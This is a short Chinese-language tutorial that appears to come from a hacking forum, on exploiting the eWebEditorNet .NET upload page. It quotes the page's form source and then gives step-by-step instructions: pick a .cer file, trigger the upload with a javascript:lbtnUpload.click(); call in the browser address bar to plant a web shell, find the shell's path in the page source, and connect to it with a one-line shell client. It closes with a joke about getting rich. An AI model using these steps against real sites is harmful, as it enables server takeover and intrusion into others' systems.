eWebEditorNet 漏洞利用

原理：eWebEditorNet/upload.aspx文件
<form id="myform" method="post" encType="multipart/form-data" runat="server">
<INPUT id="uploadfile" style="HEIGHT: 18px" type="file" size="28" name="uploadfile" runat="server">
<asp:linkbutton id="lbtnUpload" runat="server"></asp:linkbutton></form>
<script language="javascript">
// 上传表单已装入完成
try {
parent.UploadLoaded();
}
catch(e){
}
</script>
只是简单的对文件ID进行验证，只要构造javascript:lbtnUpload.click();就满足条件。

下面开始利用，打开eWebEditorNet/upload.aspx，选择一个cer文件。

再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。

下面用一句话连接一下。

谢谢各位。6月8日是个好日子哦，6表示顺利，8意味着发。6月8，一路发！！借你们的祝福我会发大财的，哈哈~~~